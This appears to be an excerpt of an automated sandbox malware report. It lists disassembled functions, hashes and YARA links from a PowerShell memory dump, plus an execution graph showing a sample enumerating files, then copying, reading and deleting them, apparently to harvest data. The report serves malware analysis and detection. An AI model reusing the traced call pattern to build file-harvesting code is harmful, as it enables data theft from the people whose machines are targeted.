                                                                            • Opcode ID: 56eebc4eceffb69e6c8f3bfa5c3b432a09ccb8178a5a7c20061e4094388bc7d9
                                                                            • Instruction ID: e2e3c28d8df18c2e48b1b2b819d94722c8e6aabc0ae143fa0163e3afff38f4f3
                                                                            • Opcode Fuzzy Hash: 56eebc4eceffb69e6c8f3bfa5c3b432a09ccb8178a5a7c20061e4094388bc7d9
                                                                            • Instruction Fuzzy Hash: 40313C74A006099FCB14CF5DC5949AAFBB1FF4C314B258699D559EB752C332EC81CBA0
                                                                            Function 07494B85 Relevance: .0, Instructions: 27COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f61c0400377c2368a44127da3532790e58ead4cb9fbad5a988c9b20096ae6fba
                                                                            • Instruction ID: 5826682da69248dfd3ddaf102025dee77018ff81821e6622efce0e90638d3680
                                                                            • Opcode Fuzzy Hash: f61c0400377c2368a44127da3532790e58ead4cb9fbad5a988c9b20096ae6fba
                                                                            • Instruction Fuzzy Hash: CFF030B010D3C14FD7568AA5C9559B2BFA19B6311230D82EFD1808F2A3C5259903D311
                                                                            Function 07494B41 Relevance: .0, Instructions: 18COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: cb63044aad1829ca893aa8d9a6c446a2fa41a62101e1ca5c21bc256a6acdaa18
                                                                            • Instruction ID: 94cc66c3a0ede34a3e848f639f13dde36a0cb9560feabb6d46707b8cd5252465
                                                                            • Opcode Fuzzy Hash: cb63044aad1829ca893aa8d9a6c446a2fa41a62101e1ca5c21bc256a6acdaa18
                                                                            • Instruction Fuzzy Hash: 15D05EB63001409BE640C588F841EA6F321E7A0225F10C5ABE2545B381C72396178B90

                                                                            Non-executed Functions

                                                                            Function 0749E915 Relevance: 19.0, Strings: 15, Instructions: 285COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$4']q$84ql$84ql$84ql$84ql$tP]q$tP]q$tP]q$tP]q$$]q$(cq$(cq$(cq$(cq
                                                                            • API String ID: 0-750411764
                                                                            • Opcode ID: daca99826912b83113676514931b0cb6c08c08e5fd14c7474b5099ee3d02143c
                                                                            • Instruction ID: dfef81f2aeb06767d5dc8a6aa2aa34d7eb424c3eb7c7ef8b2e6d4bfae0b5be51
                                                                            • Opcode Fuzzy Hash: daca99826912b83113676514931b0cb6c08c08e5fd14c7474b5099ee3d02143c
                                                                            • Instruction Fuzzy Hash: 4FA1F5B27002269FCF24DF69C550ABBBFA6BF85310F14886AE8459B394CB35DC41C7A1
                                                                            Function 0749A701 Relevance: 10.2, Strings: 8, Instructions: 169COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q
                                                                            • API String ID: 0-1910532044
                                                                            • Opcode ID: 019d505b43dbf3bbe0c6c984769c1f17df1f802df2d9492cc9a48a90261b0871
                                                                            • Instruction ID: 3ec3a34b43bf477455c523f25c396e3a2b7faf7374dddc16d68848839a08446d
                                                                            • Opcode Fuzzy Hash: 019d505b43dbf3bbe0c6c984769c1f17df1f802df2d9492cc9a48a90261b0871
                                                                            • Instruction Fuzzy Hash: A951F3B1B442069FCF29CE688455AEABFB2EF85710F14C8BBD8568B351CB35C942C791
                                                                            Function 0749B61E Relevance: 7.9, Strings: 6, Instructions: 403COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$4']q$4']q$4']q$x.dk$-dk
                                                                            • API String ID: 0-1821401884
                                                                            • Opcode ID: c3c0635f7f4266d00cf69223a3f5d7ef555162946870bdde00d6404acd5d34c2
                                                                            • Instruction ID: 09d6e83fdddd362d76cbb3ef45f94e746990ade2cd5265c81d0425c287de211c
                                                                            • Opcode Fuzzy Hash: c3c0635f7f4266d00cf69223a3f5d7ef555162946870bdde00d6404acd5d34c2
                                                                            • Instruction Fuzzy Hash: DD123DB0A002199FDB14DF54C991BDABBB2FF85304F1085E9D9096B345CB72AE85CF91
                                                                            Function 0749AAF0 Relevance: 7.6, Strings: 6, Instructions: 105COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                                            • API String ID: 0-3723351465
                                                                            • Opcode ID: 02f9a3bf1b76cf10bafd90077d60ae80d2e280148e70551bd2d4cad6244b397c
                                                                            • Instruction ID: a4abfd4ec23a8596900a0259c476b2b38e88673571082f15d1f90b5b68c86bd5
                                                                            • Opcode Fuzzy Hash: 02f9a3bf1b76cf10bafd90077d60ae80d2e280148e70551bd2d4cad6244b397c
                                                                            • Instruction Fuzzy Hash: 4E3137B27043178FDF29596998501F7BFA3AFC2211B24C87BCA868B346DE36C446C352
                                                                            Function 07490287 Relevance: 7.6, Strings: 6, Instructions: 78COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$4']q$4']q$4']q$$]q$$]q
                                                                            • API String ID: 0-2669322367
                                                                            • Opcode ID: 1c2bcb70f0c5a9dd8a7b86159909276c0bf3bbbfa40f5aed134ee8e0486d49ae
                                                                            • Instruction ID: 3742835ae26486cc06d936bdd5fb0a31037c00d1d961280ee9044e2b762e897a
                                                                            • Opcode Fuzzy Hash: 1c2bcb70f0c5a9dd8a7b86159909276c0bf3bbbfa40f5aed134ee8e0486d49ae
                                                                            • Instruction Fuzzy Hash: CF110A717097574FCB3A162C24202EB5FE69FC2A5073948FBC481DB366CE254C4A8397
                                                                            Function 0749ED25 Relevance: 6.4, Strings: 5, Instructions: 194COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 84ql$84ql$tP]q$tP]q$$]q
                                                                            • API String ID: 0-3063176222
                                                                            • Opcode ID: 8f24f261181ffcb16a87f30229acb0bc3fc1e22974230bfa652441dcdfd5e41b
                                                                            • Instruction ID: 3e753cc14b12e3d879924b940b6df24280214e125790fb5643bbf94e5c051d7b
                                                                            • Opcode Fuzzy Hash: 8f24f261181ffcb16a87f30229acb0bc3fc1e22974230bfa652441dcdfd5e41b
                                                                            • Instruction Fuzzy Hash: 3161F2B2B001269FCF14DF688540AABBFE2AF85700F58C47AE8159B395CB35DD41CBA1
                                                                            Function 07490554 Relevance: 6.4, Strings: 5, Instructions: 134COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$4']q$$]q$$]q$$]q
                                                                            • API String ID: 0-2353078639
                                                                            • Opcode ID: 610223df604bebf07aaa74c0a8a9ce96c911543c8b38719bc916ee5d2d197972
                                                                            • Instruction ID: f8f4f2932d6035b30734100d085f23e099de390bbe7e562f706a256cdef88f28
                                                                            • Opcode Fuzzy Hash: 610223df604bebf07aaa74c0a8a9ce96c911543c8b38719bc916ee5d2d197972
                                                                            • Instruction Fuzzy Hash: 444118F1714207AFDF295A2485106FE7FA6AFC1221F14487BD9418B2A2DF36CD46C762
                                                                            Function 07495468 Relevance: 6.4, Strings: 5, Instructions: 130COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$4']q$$]q$$]q$$]q
                                                                            • API String ID: 0-2353078639
                                                                            • Opcode ID: 1f2b7c1e68fc276f43d0d585cead9003777f8beb40d69d3e309c5afbce352e53
                                                                            • Instruction ID: 161cc00c6448c7f739dff8e98528767c63a038361a57731d2f7c763625bbf8d4
                                                                            • Opcode Fuzzy Hash: 1f2b7c1e68fc276f43d0d585cead9003777f8beb40d69d3e309c5afbce352e53
                                                                            • Instruction Fuzzy Hash: 19412BB1740246EBCF2B4E2C95502E6FFE6AF82221F3588B7E8458B2D6DA31C521C711
                                                                            Function 0749E3F5 Relevance: 6.4, Strings: 5, Instructions: 115COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$4']q$$]q$$]q$$]q
                                                                            • API String ID: 0-2353078639
                                                                            • Opcode ID: 45bd7de24ee17b9a870044e1c94ea06a553910718188de9205e5744329abff8a
                                                                            • Instruction ID: 4a285d8edcdcbb792d78163906d403d05f3b83b83a332d535c71e5e29d6e216e
                                                                            • Opcode Fuzzy Hash: 45bd7de24ee17b9a870044e1c94ea06a553910718188de9205e5744329abff8a
                                                                            • Instruction Fuzzy Hash: 9E3128B3B842368FCF29CAB999506F7BFD5AF82620B24487BC945C6346DA36C406C751
                                                                            Function 07491598 Relevance: 6.3, Strings: 5, Instructions: 71COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $]q$$]q$$]q$il$il
                                                                            • API String ID: 0-3875059678
                                                                            • Opcode ID: 65167bb57b1fd00cd550d1b8becb37de6ec9666886eb137506154ee6ee9fe477
                                                                            • Instruction ID: e6891490b54da25c05718862a66071b40870d9abd26226c55e7db1f1d1ee83b0
                                                                            • Opcode Fuzzy Hash: 65167bb57b1fd00cd550d1b8becb37de6ec9666886eb137506154ee6ee9fe477
                                                                            • Instruction Fuzzy Hash: 041106B170420BABDF28592E9810BA7BFAABBC1721F29843BE84687390C971C841C750
                                                                            Function 0749FAF0 Relevance: 5.3, Strings: 4, Instructions: 312COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (fsl$(fsl$(fsl$(fsl
                                                                            • API String ID: 0-2021254019
                                                                            • Opcode ID: 25dde1ff8e71c39baea2fe089a53dccbd1f2b6e59473128bf68f4d2d6be1fe52
                                                                            • Instruction ID: 4621b6de703bdf847aba780730432f2fc664150cd2b2c7577d7864873d9e0ff3
                                                                            • Opcode Fuzzy Hash: 25dde1ff8e71c39baea2fe089a53dccbd1f2b6e59473128bf68f4d2d6be1fe52
                                                                            • Instruction Fuzzy Hash: 0BC19FB4A00219DFCF14CF58C551AAABBB2FF89714F24C56AD805AB745CB32EC46CB91
                                                                            Function 07498158 Relevance: 5.2, Strings: 4, Instructions: 192COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (fsl$(fsl$(fsl$(fsl
                                                                            • API String ID: 0-2021254019
                                                                            • Opcode ID: 6bd71a5aa87d47737d9b4585f34959c17c1ecc0f8aa353b5691053dbb5e6cde0
                                                                            • Instruction ID: 53984ec82ebb9fa2ca7ebad7a8a24e1ce0d356e1fd1e571b59cf8fca25cca961
                                                                            • Opcode Fuzzy Hash: 6bd71a5aa87d47737d9b4585f34959c17c1ecc0f8aa353b5691053dbb5e6cde0
                                                                            • Instruction Fuzzy Hash: 38718FB0A00205DFCB14CF9CC655AAEBBA6FF8A310F14956AD805AB355CB36EC45CB91
                                                                            Function 07498457 Relevance: 5.1, Strings: 4, Instructions: 108COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $]q$$]q$$]q$$]q
                                                                            • API String ID: 0-858218434
                                                                            • Opcode ID: 69f2e691f3027517900569f1a5d601d79445bf91b01dbda00ce2ba245dd27a5c
                                                                            • Instruction ID: 2a1ef5219b3eacf8c8380273221a34fcf3cac6a5213c5714c8a0dd2095193e52
                                                                            • Opcode Fuzzy Hash: 69f2e691f3027517900569f1a5d601d79445bf91b01dbda00ce2ba245dd27a5c
                                                                            • Instruction Fuzzy Hash: 75314CB12497955FCB32062C58105E66FBD9FC3220B5A48BBC841CF657D8358C4AC362
                                                                            Function 074936A0 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $]q$$]q$$]q$$]q
                                                                            • API String ID: 0-858218434
                                                                            • Opcode ID: bd7cca87cb4ee4839d830ca67aedd4f026aa49af68eb96747242c547fc4f4f74
                                                                            • Instruction ID: cbabfdd47819a138286410ebfca95e33922459bbb2978c6de3bc7e9a425f6a15
                                                                            • Opcode Fuzzy Hash: bd7cca87cb4ee4839d830ca67aedd4f026aa49af68eb96747242c547fc4f4f74
                                                                            • Instruction Fuzzy Hash: D02137F23102066BDF385D6A8850B67BEDA9BC3B11F24C87B9949C7391DD36C8418371
                                                                            Function 074997FC Relevance: 5.1, Strings: 4, Instructions: 84COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ,Ssl$,Ssl$p5ck$xSsl
                                                                            • API String ID: 0-2225154413
                                                                            • Opcode ID: d8ff0aa16cc10083012cd788385633d3c1902668c14d4b84988547b7ddaadc55
                                                                            • Instruction ID: 5905f177251b92c086fd661c097b14ca86c20805543f5a56a8a895b25ce059bf
                                                                            • Opcode Fuzzy Hash: d8ff0aa16cc10083012cd788385633d3c1902668c14d4b84988547b7ddaadc55
                                                                            • Instruction Fuzzy Hash: 352138F2B50216CBCF24C66891112EBFFD5DFC6221B14887FC44A8B745DA36E852C7A2

                                                                            Execution Graph

                                                                            Execution Coverage:2%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:1.8%
                                                                            Total number of Nodes:1556
                                                                            Total number of Limit Nodes:1
                                                                            execution_graph 6954 235f4bdd 6955 235f4bec 6954->6955 6956 235f4c08 6954->6956 6955->6956 6958 235f4bf2 6955->6958 6977 235f6d60 6956->6977 6960 235f6368 _free 20 API calls 6958->6960 6962 235f4bf7 6960->6962 6961 235f4c33 6981 235f4d01 6961->6981 6963 235f62ac _abort 26 API calls 6962->6963 6965 235f4c01 6963->6965 6969 235f4c66 6971 235f6368 _free 20 API calls 6969->6971 6970 235f4c72 6972 235f4d01 38 API calls 6970->6972 6976 235f4c6b 6971->6976 6973 235f4c88 6972->6973 6975 235f571e _free 20 API calls 6973->6975 6973->6976 6974 235f571e _free 20 API calls 6974->6965 6975->6976 6976->6974 6978 235f4c0f GetModuleFileNameA 6977->6978 6979 235f6d69 6977->6979 6978->6961 6993 235f6c5f 6979->6993 6983 235f4d26 6981->6983 6985 235f4d86 6983->6985 7149 235f70eb 6983->7149 6984 235f4c50 6987 235f4e76 6984->6987 6985->6984 6986 235f70eb 38 API calls 6985->6986 6986->6985 6988 235f4e8b 6987->6988 6989 235f4c5d 6987->6989 6988->6989 6990 235f637b __dosmaperr 20 API calls 6988->6990 6989->6969 6989->6970 6991 235f4eb9 6990->6991 6992 235f571e _free 20 API calls 6991->6992 6992->6989 6994 235f5af6 _abort 38 API calls 6993->6994 6995 235f6c6c 6994->6995 6996 235f6d7e __fassign 38 API calls 6995->6996 6997 235f6c74 6996->6997 7013 235f69f3 6997->7013 7000 235f6c8b 7000->6978 7003 235f6cce 7006 235f571e _free 20 API calls 7003->7006 7006->7000 7007 235f6cc9 7008 235f6368 _free 20 API calls 7007->7008 7008->7003 7009 235f6d12 7009->7003 7037 235f68c9 7009->7037 7010 235f6ce6 7010->7009 7011 235f571e _free 20 API calls 7010->7011 7011->7009 7014 235f54a7 __fassign 38 API calls 7013->7014 7015 235f6a05 7014->7015 7016 235f6a26 7015->7016 7017 235f6a14 GetOEMCP 7015->7017 7018 235f6a3d 7016->7018 7019 235f6a2b GetACP 7016->7019 7017->7018 7018->7000 7020 235f56d0 7018->7020 7019->7018 7021 235f570e 7020->7021 7026 235f56de __dosmaperr 7020->7026 7022 235f6368 _free 20 API calls 7021->7022 7024 235f570c 7022->7024 7023 235f56f9 RtlAllocateHeap 7023->7024 7023->7026 7024->7003 7027 235f6e20 7024->7027 7025 235f474f __dosmaperr 7 API calls 7025->7026 7026->7021 7026->7023 7026->7025 7028 235f69f3 40 API calls 7027->7028 7029 235f6e3f 7028->7029 7032 235f6e90 IsValidCodePage 7029->7032 7034 235f6e46 7029->7034 7036 235f6eb5 ___scrt_fastfail 7029->7036 7030 235f2ada _ValidateLocalCookies 5 API calls 7031 235f6cc1 7030->7031 7031->7007 7031->7010 7033 235f6ea2 GetCPInfo 7032->7033 7032->7034 7033->7034 7033->7036 7034->7030 7040 235f6acb GetCPInfo 7036->7040 7113 235f6886 7037->7113 7039 235f68ed 7039->7003 7041 235f6b05 7040->7041 7042 235f6baf 7040->7042 7050 235f86e4 7041->7050 7045 235f2ada _ValidateLocalCookies 5 API calls 7042->7045 7046 235f6c5b 7045->7046 7046->7034 7049 235f8a3e 43 API calls 7049->7042 7051 235f54a7 __fassign 38 API calls 7050->7051 7052 235f8704 MultiByteToWideChar 7051->7052 7054 235f8742 7052->7054 7062 235f87da 7052->7062 7056 235f56d0 21 API calls 7054->7056 7059 235f8763 ___scrt_fastfail 7054->7059 7055 235f2ada _ValidateLocalCookies 5 API calls 7057 235f6b66 7055->7057 7056->7059 7064 235f8a3e 7057->7064 7058 235f87d4 7069 235f8801 7058->7069 7059->7058 7061 235f87a8 MultiByteToWideChar 7059->7061 7061->7058 7063 235f87c4 GetStringTypeW 7061->7063 7062->7055 7063->7058 7065 235f54a7 __fassign 38 API calls 7064->7065 7066 235f8a51 7065->7066 7073 235f8821 7066->7073 7070 235f881e 7069->7070 7071 235f880d 7069->7071 7070->7062 7071->7070 7072 235f571e _free 20 API calls 7071->7072 7072->7070 7074 235f883c 7073->7074 7075 235f8862 MultiByteToWideChar 7074->7075 7076 235f888c 7075->7076 7077 235f8a16 7075->7077 7081 235f56d0 21 API calls 7076->7081 7083 235f88ad 7076->7083 7078 235f2ada _ValidateLocalCookies 5 API calls 7077->7078 7079 235f6b87 7078->7079 7079->7049 7080 235f88f6 MultiByteToWideChar 7082 235f890f 7080->7082 7095 235f8962 7080->7095 7081->7083 7100 235f5f19 7082->7100 7083->7080 7083->7095 7085 235f8801 __freea 20 API calls 7085->7077 7087 235f8939 7091 235f5f19 11 API calls 7087->7091 7087->7095 7088 235f8971 7089 235f8992 7088->7089 7090 235f56d0 21 API calls 7088->7090 7092 235f8a07 7089->7092 7094 235f5f19 11 API calls 7089->7094 7090->7089 7091->7095 7093 235f8801 __freea 20 API calls 7092->7093 7093->7095 7096 235f89e6 7094->7096 7095->7085 7096->7092 7097 235f89f5 WideCharToMultiByte 7096->7097 7097->7092 7098 235f8a35 7097->7098 7099 235f8801 __freea 20 API calls 7098->7099 7099->7095 7101 235f5c45 __dosmaperr 5 API calls 7100->7101 7102 235f5f40 7101->7102 7105 235f5f49 7102->7105 7108 235f5fa1 7102->7108 7106 235f2ada _ValidateLocalCookies 5 API calls 7105->7106 7107 235f5f9b 7106->7107 7107->7087 7107->7088 7107->7095 7109 235f5c45 __dosmaperr 5 API calls 7108->7109 7110 235f5fc8 7109->7110 7111 235f2ada _ValidateLocalCookies 5 API calls 7110->7111 7112 235f5f89 LCMapStringW 7111->7112 7112->7105 7114 235f6892 ___DestructExceptionObject 7113->7114 7121 235f5671 RtlEnterCriticalSection 7114->7121 7116 235f689c 7122 235f68f1 7116->7122 7120 235f68b5 _abort 7120->7039 7121->7116 7134 235f7011 7122->7134 7124 235f693f 7125 235f7011 26 API calls 7124->7125 7126 235f695b 7125->7126 7127 235f7011 26 API calls 7126->7127 7128 235f6979 7127->7128 7129 235f571e _free 20 API calls 7128->7129 7130 235f68a9 7128->7130 7129->7130 7131 235f68bd 7130->7131 7148 235f56b9 RtlLeaveCriticalSection 7131->7148 7133 235f68c7 7133->7120 7135 235f7022 7134->7135 7144 235f701e 7134->7144 7136 235f7029 7135->7136 7140 235f703c ___scrt_fastfail 7135->7140 7137 235f6368 _free 20 API calls 7136->7137 7138 235f702e 7137->7138 7139 235f62ac _abort 26 API calls 7138->7139 7139->7144 7141 235f706a 7140->7141 7142 235f7073 7140->7142 7140->7144 7143 235f6368 _free 20 API calls 7141->7143 7142->7144 7146 235f6368 _free 20 API calls 7142->7146 7145 235f706f 7143->7145 7144->7124 7147 235f62ac _abort 26 API calls 7145->7147 7146->7145 7147->7144 7148->7133 7152 235f7092 7149->7152 7153 235f54a7 __fassign 38 API calls 7152->7153 7154 235f70a6 7153->7154 7154->6983 6786 235f281c 6787 235f2882 std::exception::exception 27 API calls 6786->6787 6788 235f282a 6787->6788 5744 235f1c5b 5745 235f1c6b ___scrt_fastfail 5744->5745 5748 235f12ee 5745->5748 5747 235f1c87 5749 235f1324 ___scrt_fastfail 5748->5749 5750 235f13b7 GetEnvironmentVariableW 5749->5750 5774 235f10f1 5750->5774 5753 235f10f1 57 API calls 5754 235f1465 5753->5754 5755 235f10f1 57 API calls 5754->5755 5756 235f1479 5755->5756 5757 235f10f1 57 API calls 5756->5757 5758 235f148d 5757->5758 5759 235f10f1 57 API calls 5758->5759 5760 235f14a1 5759->5760 5761 235f10f1 57 API calls 5760->5761 5762 235f14b5 lstrlenW 5761->5762 5763 235f14d9 lstrlenW 5762->5763 5764 235f14d2 5762->5764 5765 235f10f1 57 API calls 5763->5765 5764->5747 5766 235f1501 lstrlenW lstrcatW 5765->5766 5767 235f10f1 57 API calls 5766->5767 5768 235f1539 lstrlenW lstrcatW 5767->5768 5769 235f10f1 57 API calls 5768->5769 5770 235f156b lstrlenW lstrcatW 5769->5770 5771 235f10f1 57 API calls 5770->5771 5772 235f159d lstrlenW lstrcatW 5771->5772 5773 235f10f1 57 API calls 5772->5773 5773->5764 5775 235f1118 ___scrt_fastfail 5774->5775 5776 235f1129 lstrlenW 5775->5776 5787 235f2c40 5776->5787 5779 235f1168 lstrlenW 5780 235f1177 lstrlenW FindFirstFileW 5779->5780 5781 235f11e1 5780->5781 5782 235f11a0 5780->5782 5781->5753 5783 235f11aa 5782->5783 5784 235f11c7 FindNextFileW 5782->5784 5783->5784 5789 235f1000 5783->5789 5784->5782 5786 235f11da FindClose 5784->5786 5786->5781 5788 235f1148 lstrcatW lstrlenW 5787->5788 5788->5779 5788->5780 5790 235f1022 ___scrt_fastfail 5789->5790 5791 235f10af 5790->5791 5792 235f102f lstrcatW lstrlenW 5790->5792 5795 235f10b5 lstrlenW 5791->5795 5805 235f10ad 5791->5805 5793 235f106b lstrlenW 5792->5793 5794 235f105a lstrlenW 5792->5794 5806 235f1e89 lstrlenW 5793->5806 5794->5793 5820 235f1e16 5795->5820 5798 235f1088 GetFileAttributesW 5800 235f109c 5798->5800 5798->5805 5799 235f10ca 5801 235f1e89 5 API calls 5799->5801 5799->5805 5800->5805 5812 235f173a 5800->5812 5802 235f10df 5801->5802 5825 235f11ea 5802->5825 5805->5783 5807 235f2c40 ___scrt_fastfail 5806->5807 5808 235f1ea7 lstrcatW lstrlenW 5807->5808 5809 235f1ec2 5808->5809 5810 235f1ed1 lstrcatW 5808->5810 5809->5810 5811 235f1ec7 lstrlenW 5809->5811 5810->5798 5811->5810 5813 235f1747 ___scrt_fastfail 5812->5813 5840 235f1cca 5813->5840 5816 235f199f 5816->5805 5818 235f1824 ___scrt_fastfail _strlen 5818->5816 5860 235f15da 5818->5860 5821 235f1e29 5820->5821 5824 235f1e4c 5820->5824 5822 235f1e2d lstrlenW 5821->5822 5821->5824 5823 235f1e3f lstrlenW 5822->5823 5822->5824 5823->5824 5824->5799 5826 235f120e ___scrt_fastfail 5825->5826 5827 235f1e89 5 API calls 5826->5827 5828 235f1220 GetFileAttributesW 5827->5828 5829 235f1246 5828->5829 5830 235f1235 5828->5830 5831 235f1e89 5 API calls 5829->5831 5830->5829 5832 235f173a 35 API calls 5830->5832 5833 235f1258 5831->5833 5832->5829 5834 235f10f1 56 API calls 5833->5834 5835 235f126d 5834->5835 5836 235f1e89 5 API calls 5835->5836 5837 235f127f ___scrt_fastfail 5836->5837 5838 235f10f1 56 API calls 5837->5838 5839 235f12e6 5838->5839 5839->5805 5841 235f1cf1 ___scrt_fastfail 5840->5841 5842 235f1d0f CopyFileW CreateFileW 5841->5842 5843 235f1d55 GetFileSize 5842->5843 5844 235f1d44 DeleteFileW 5842->5844 5845 235f1ede 22 API calls 5843->5845 5849 235f1808 5844->5849 5846 235f1d66 ReadFile 5845->5846 5847 235f1d7d CloseHandle DeleteFileW 5846->5847 5848 235f1d94 CloseHandle DeleteFileW 5846->5848 5847->5849 5848->5849 5849->5816 5850 235f1ede 5849->5850 5852 235f222f 5850->5852 5853 235f224e 5852->5853 5856 235f2250 5852->5856 5868 235f474f 5852->5868 5873 235f47e5 5852->5873 5853->5818 5855 235f2908 5857 235f35d2 __CxxThrowException@8 RaiseException 5855->5857 5856->5855 5880 235f35d2 5856->5880 5859 235f2925 5857->5859 5859->5818 5861 235f160c _strcat _strlen 5860->5861 5862 235f163c lstrlenW 5861->5862 5968 235f1c9d 5862->5968 5864 235f1655 lstrcatW lstrlenW 5865 235f1678 5864->5865 5866 235f167e lstrcatW 5865->5866 5867 235f1693 ___scrt_fastfail 5865->5867 5866->5867 5867->5818 5883 235f4793 5868->5883 5871 235f478f 5871->5852 5872 235f4765 5889 235f2ada 5872->5889 5878 235f56d0 